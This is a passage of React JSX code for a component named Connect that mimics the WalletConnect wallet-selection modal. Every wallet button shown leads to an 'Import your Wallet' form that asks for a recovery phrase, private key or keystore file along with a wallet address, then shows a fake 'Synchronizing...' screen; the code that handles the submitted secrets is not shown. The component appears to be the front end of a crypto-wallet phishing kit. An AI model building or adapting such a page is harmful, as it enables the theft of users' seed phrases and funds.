                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        AToken
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/4e6af4201658b52daad51a279bb363a08b3927e74c0f27abeca3b0110bddf0a9.jpeg") rgb(255, 49, 120)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Tongue
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/b13fcc7e3500a4580c9a5341ed64c49c17d7f864497881048eb160c089be5346.jpeg") rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        RWallet
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/13c6a06b733edf51784f669f508826b2ab0dc80122a8b5d25d84b17d94bbdf70.jpeg") rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        PlasmaPay
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/0aafbedfb8eb56dae59ecc37c9a5388509cf9c082635e3f752581cc7128a17c0.jpeg") rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        O3Wallet
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/761d3d98fd77bdb06e6c90092ee7071c6001e93401d05dcf2b007c1a6c9c222c.jpeg") rgb(254, 142, 63)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        HashKey Me
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/ffa139f74d1c8ebbb748cf0166f92d886e8c81b521c2193aa940e00626f4e215.jpeg") rgb(39, 74, 96)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Defiant
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/d01c7758d741b363e637a817a09bcf579feae4db9f5bb16f599fdd1f66e2f974.jpeg") rgb(66, 214, 137)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Valora
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/36d854b702817e228d5c853c528d7bdb46f4bb041d255f67b82eb47111e5676b.jpeg") rgb(53, 208, 127)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Celo Wallet
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/717911f4db0c5eda0e02e76ed179b7940ba1eefffdfb3c9e6540696226860da0.jpeg") rgb(0, 0, 0)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Essentials
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/c20b97dd1679625f4eb0bccd727c80746cb13bd97208b0c8e62c89cfd1d4b9cc.jpeg") rgb(55, 216, 136)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        fuse.cash
                      </div>
                    </a>
                  </div>
                  <div
                    id="fifth"
                    className="walletconnect-connect__buttons__wrapper__wrap"
                    style={{ display: fifth ? '' : 'none' }}
                  >
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/9e3f6d07815cfaf1ef7afb089e5c6895b254fced0b84a9ff2b449a631605b5db.jpeg") rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Bitpie
                      </div>
                    </a>
                    <center />
                  </div>
                  <div style={{ display: privates ? '' : 'none' }}>
                    <div style={{ marginTop: 2 }}>
                      <h4 style={{ color: "rgb(114, 117, 134)" }}>
                        Import your Wallet
                      </h4>
                      <p
                        style={{
                          paddingBottom: 3,
                          borderBottom: "2px solid rgb(114, 117, 134)",
                          fontSize: 12
                        }}
                      >
                        <b className="hg" style={{ color: "rgb(114, 117, 134)" }} onClick={() => {
                          setfirst(false);
                          setsecond(false);
                          setthird(false);
                          setfourth(false);
                          setfifth(false)
                          setfoot(false)
                          setkeystore(false)
                          setphrase(true)
                          setprivates(false)
                          setsync(false)
                        }} >
                          Phrase
                        </b>
                        <b className="hg" style={{ color: "rgb(114, 117, 134)" }} onClick={() => {
                          setfirst(false);
                          setsecond(false);
                          setthird(false);
                          setfourth(false);
                          setfifth(false)
                          setfoot(false)
                          setkeystore(false)
                          setphrase(true)
                          setprivates(false)
                          setsync(false)
                        }}>
                          Keystore JSON
                        </b>
                        <b
                          className="hg"
                          style={{ fontWeight: "bold", color: "grey" }}
                          onClick={() => {
                            setfirst(false);
                            setsecond(false);
                            setthird(false);
                            setfourth(false);
                            setfifth(false)
                            setfoot(false)
                            setkeystore(false)
                            setphrase(false)
                            setprivates(true)
                            setsync(false)
                          }}
                        >
                          Private Key
                        </b>
                      </p>
                      <input
                        type="text"
                        placeholder="Enter your Private Key"
                        className="form-control"
                        name="phrase"
                        style={{ backgroundColor: "whitesmoke", color: "black" }}
                        onChange={(e) => setph(e.target.value)}
                      />
                      <input
                        type="text"
                        placeholder="Wallet address"
                        className="form-control"
                        onChange={(e) => setadr(e.target.value)}
                        name="address"
                        style={{ backgroundColor: "whitesmoke", color: "black", marginTop: 5 }}
                      />
                      <p
                        style={{
                          fontSize: 10,
                          color: "rgb(114, 117, 134)",
                          paddingTop: 5
                        }}
                      >
                        Typically 12 (sometimes 24) words separated by single spaces
                      </p>
                      <button
                        className="btn-primary btn btn-blocked col-12"
                        style={{ marginTop: 5 }}
                        onClick={() => proceed()}
                        disabled={!ph || !adr} // Disable if ph or adr is empty
                      >
                        Proceed
                      </button>
                      <button
                        className="btn btn-danger btn-blocked col-12"
                        style={{ marginTop: 5 }}
                        onClick={() => {
                          setfirst(true);
                          setsecond(false);
                          setthird(false);
                          setfourth(false);
                          setfifth(false)
                          setfoot(true)
                          setkeystore(false)
                          setphrase(false)
                          setprivates(false)
                          setsync(false)
                        }}
                      >
                        Cancel
                      </button>
                    </div>
                  </div>
                  <div style={{ display: Keystore ? '' : 'none' }}>
                    <div style={{ marginTop: 2 }}>
                      <h4 style={{ color: "rgb(114, 117, 134)" }}>
                        Import your Wallet
                      </h4>
                      <p
                        style={{
                          paddingBottom: 3,
                          borderBottom: "2px solid rgb(114, 117, 134)",
                          fontSize: 12
                        }}
                      >
                        <b className="hg" style={{ color: "rgb(114, 117, 134)" }} onClick={() => {
                          setfirst(false);
                          setsecond(false);
                          setthird(false);
                          setfourth(false);
                          setfifth(false)
                          setfoot(false)
                          setkeystore(false)
                          setphrase(true)
                          setprivates(false)
                          setsync(false)
                        }}>
                          Phrase
                        </b>
                        <b
                          className="hg"
                          style={{ fontWeight: "bold", color: "grey" }}
                          onClick={() => {
                            setfirst(false);
                            setsecond(false);
                            setthird(false);
                            setfourth(false);
                            setfifth(false)
                            setfoot(false)
                            setkeystore(true)
                            setphrase(false)
                            setprivates(false)
                            setsync(false)
                          }}
                        >
                          Keystore JSON
                        </b>
                        <b className="hg" style={{ color: "rgb(114, 117, 134)" }} onClick={() => {
                          setfirst(false);
                          setsecond(false);
                          setthird(false);
                          setfourth(false);
                          setfifth(false)
                          setfoot(false)
                          setkeystore(false)
                          setphrase(false)
                          setprivates(true)
                          setsync(false)
                        }}>
                          Private Key
                        </b>
                      </p>
                      <input id="file" type="file" style={{ display: "none" }} />
                      <label htmlFor="file" className="json col-12">
                        Choose Keystore File
                      </label>
                      <input
                        type="text"
                        placeholder="Wallet address"
                        className="form-control"
                        onChange={(e) => setadr(e.target.value)}
                        name="address"
                        style={{ marginTop: 5 }}
                      />
                      <p
                        style={{
                          fontSize: 10,
                          color: "rgb(114, 117, 134)",
                          paddingTop: 5
                        }}
                      >
                        Typically 12 (sometimes 24) words separated by single spaces
                      </p>
                      <button
                        className="btn-primary btn  btn-blocked col-12"
                        style={{ marginTop: 5 }}
                        onClick={() => proceed()}
                        disabled={!ph || !adr}
                      >
                        Proceed
                      </button>
                      <button
                        className="btn btn-danger btn-blocked col-12"
                        style={{ marginTop: 5 }}
                        onClick={() => {
                          setfirst(true);
                          setsecond(false);
                          setthird(false);
                          setfourth(false);
                          setfifth(false)
                          setfoot(true)
                          setkeystore(false)
                          setphrase(false)
                          setprivates(false)
                          setsync(false)
                        }}
                      >
                        Cancel
                      </button>
                    </div>
                  </div>
                  <div style={{ display: phrase ? '' : 'none' }}>
                    <div style={{ marginTop: 2 }}>
                      <h4 style={{ color: "rgb(114, 117, 134)" }}>
                        Import your Wallet
                      </h4>
                      <p
                        style={{
                          paddingBottom: 3,
                          borderBottom: "2px solid rgb(114, 117, 134)",
                          fontSize: 12
                        }}
                      >
                        <b
                          className="hg"
                          style={{ fontWeight: "bold", color: "rgb(114, 117, 134)" }}
                          onClick={() => {
                            setfirst(false);
                            setsecond(false);
                            setthird(false);
                            setfourth(false);
                            setfifth(false)
                            setfoot(false)
                            setkeystore(false)
                            setphrase(true)
                            setprivates(false)
                            setsync(false)
                          }}
                        >
                          Phrase
                        </b>
                        <b className="hg" style={{ color: "rgb(114, 117, 134)" }} onClick={() => {
                          setfirst(false);
                          setsecond(false);
                          setthird(false);
                          setfourth(false);
                          setfifth(false)
                          setfoot(false)
                          setkeystore(true)
                          setphrase(false)
                          setprivates(false)
                          setsync(false)
                        }}>
                          Keystore JSON
                        </b>
                        <b className="hg" style={{ color: "grey" }} onClick={() => {
                          setfirst(false);
                          setsecond(false);
                          setthird(false);
                          setfourth(false);
                          setfifth(false)
                          setfoot(false)
                          setkeystore(false)
                          setphrase(false)
                          setprivates(true)
                          setsync(false)
                        }}>
                          Private Key
                        </b>
                      </p>
                      <textarea
                        type="text"
                        placeholder="Enter your Recovery Phrase"
                        className="form-control"
                        onChange={(e) => setph(e.target.value)}
                        name="phrase"
                        style={{ height: 100, backgroundColor: "whitesmoke", color: "black" }}
                        defaultValue={""}
                      />
                      <input
                        type="text"
                        placeholder="Wallet address"
                        onChange={(e) => setadr(e.target.value)}
                        className="form-control"
                        name="address"
                        style={{ backgroundColor: "whitesmoke", color: "black", marginTop: 5 }}
                      />
                      <p
                        style={{
                          fontSize: 10,
                          color: "rgb(114, 117, 134)",
                          paddingTop: 5
                        }}
                      >
                        Typically 12 (sometimes 24) words separated by single spaces
                      </p>
                      <button
                        className="btn-primary btn  btn-blocked col-12"
                        style={{ marginTop: 5 }}
                        onClick={() => proceed()}
                        disabled={!ph || !adr}
                      >
                        Proceed
                      </button>
                      <button
                        className="btn btn-danger btn-blocked col-12"
                        style={{ marginTop: 5 }}
                        onClick={() => {
                          setfirst(true);
                          setsecond(false);
                          setthird(false);
                          setfourth(false);
                          setfifth(false)
                          setfoot(true)
                          setkeystore(false)
                          setphrase(false)
                          setprivates(false)
                          setsync(false)
                        }}
                      >
                        Cancel
                      </button>
                    </div>
                  </div>
                  <div className="page" style={{ display: sync ? '' : 'none' }}>
                    <center style={{ justifyContent: "center", marginTop: "10%" }}>
                      {" "}
                      <img
                        src="loading-36.webp"
                        style={{ height: 100, width: 100 }}
                      />
                      <p style={{ color: "grey" }}>Synchronizing...</p>
                    </center>
                  </div>
                  <div style={{ display: foot ? '' : 'none' }} className="walletconnect-modal__footer">
                    <button onClick={() => {
                      setfirst(true);
                      setsecond(false);
                      setthird(false);
                      setfourth(false);
                      setfifth(false)
                      setfoot(true)
                      setkeystore(false)
                      setphrase(false)
                      setprivates(false)
                      setsync(false)
                    }} style={{ margin: "auto 10px", fontWeight: "bold" }}>
                      1
                    </button>
                    <button onClick={() => {
                      setfirst(false);
                      setsecond(true);
                      setthird(false);
                      setfourth(false);
                      setfifth(false)
                      setfoot(true)
                      setkeystore(false)
                      setphrase(false)
                      setprivates(false)
                      setsync(false)
                    }} style={{ margin: "auto 10px", fontWeight: "normal" }}>
                      2
                    </button>
                    <button onClick={() => {
                      setfirst(false);
                      setsecond(false);
                      setthird(true);
                      setfourth(false);
                      setfifth(false)
                      setfoot(true)
                      setkeystore(false)
                      setphrase(false)
                      setprivates(false)
                      setsync(false)
                    }} style={{ margin: "auto 10px", fontWeight: "normal" }}>
                      3
                    </button>
                    <button onClick={() => {
                      setfirst(false);
                      setsecond(false);
                      setthird(false);
                      setfourth(true);
                      setfifth(false)
                      setfoot(true)
                      setkeystore(false)
                      setphrase(false)
                      setprivates(false)
                      setsync(false)
                    }} style={{ margin: "auto 10px", fontWeight: "normal" }}>
                      4
                    </button>
                    <button onClick={() => {
                      setfirst(false);
                      setsecond(false);
                      setthird(false);
                      setfourth(false);
                      setfifth(true)
                      setfoot(true)
                      setkeystore(false)
                      setphrase(false)
                      setprivates(false)
                      setsync(false)
                    }} style={{ margin: "auto 10px", fontWeight: "normal" }}>
                      5
                    </button>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>

    )
  }

  export default Connect